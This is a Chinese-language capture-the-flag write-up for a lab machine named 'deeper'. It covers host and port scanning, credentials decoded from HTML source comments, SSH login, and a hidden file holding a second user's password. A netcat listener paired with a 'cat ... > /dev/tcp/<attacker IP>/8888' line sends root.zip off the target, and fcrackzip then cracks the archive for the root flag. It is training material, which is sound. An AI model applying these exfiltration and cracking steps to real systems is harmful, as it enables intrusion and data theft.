信息搜集

主机扫描

arp-scan -l 
搜索主机ip

端口扫描

nmap -sV -p- -Pn  192.168.168.99 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 22:22 EDT
Nmap scan report for 192.168.168.99
Host is up (0.00063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
MAC Address: 08:00:27:5E:97:3F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds

网站路径

  1. 扫描路径什么也没有,于是看看网站源码,发现一个路径/deeper
  2. 还是一个图片,在此查看源码,/evendeeper
  3. 还是一个文字,开始挖掘,查看源码,发现密码
 <!-- USER .- .-.. .. -.-. . -->     =>user=ALICE
<!-- PASS 53586470624778486230526c5a58426c63673d3d -->    =>pass=IwillGoDeeper
(md5+base64)
藏在源码的犄角旮旯,自己好好找找

获取shell

利用ssh登录

alice@deeper:~$ cat user.txt
7e267b737cc121c29b496dc3bcffa5a7

提权

  • 发现一个bob用户的txt,疑似密码
alice@deeper:~$ cat .bob.txt
535746745247566c634556756233566e61413d3d
确实是=   IamDeepEnough

发现一个root.zip,unzip没有用,于是利用nc,将文件传送到我的kali http://162.14.82.114/index.php/550/04/14/2024/)

kali:nc -lp 8888 > root.zip
靶机:cat root.zip > /dev/tcp/192.168.168.205/8888(下文解释)
解压需要密码,利用爆破工具fcrackzip:
  -u 表示只显示破解出来的密码,其他错误的密码不显示出
  -D 表示要使用字典破解
  -p 表示要使用那个字典破解
拿取root.txt

bob@deeper:~$ su root
Password: 
root@deeper:/home/bob# ls
root.zip
root@deeper:/home/bob# cd /root
root@deeper:~# ls -a
.  ..  .bash_history  .bashrc  .lesshst  .local  .profile  root.txt  .ssh
root@deeper:~# cat root.txt 
dbc56c8328ee4d00bbdb658a8fc3e895
root@deeper:~#

知识点:

  1. 信息搜集,源码的检查
  2. nc文件传输:nc -lp port > 文件名
  3. * cat: 这是一个命令,用于连接文件并打印它们的内容到标准输出。
    * root.zip: 这是要读取的文件名,cat 命令将会读取它的内容。
    * > /dev/tcp/192.168.168.205/8888: 这部分是一个重定向,它将 cat 命令的输出重定向到一个特殊的 设备文件 /dev/tcp/192.168.168.205/8888,这个设备文件实际上代表了一个 TCP 连接。 192.168.168.205 是目标主机的 IP 地址,8888 是目标端口号。
  4. 爆破文件fcrackzip工具的使用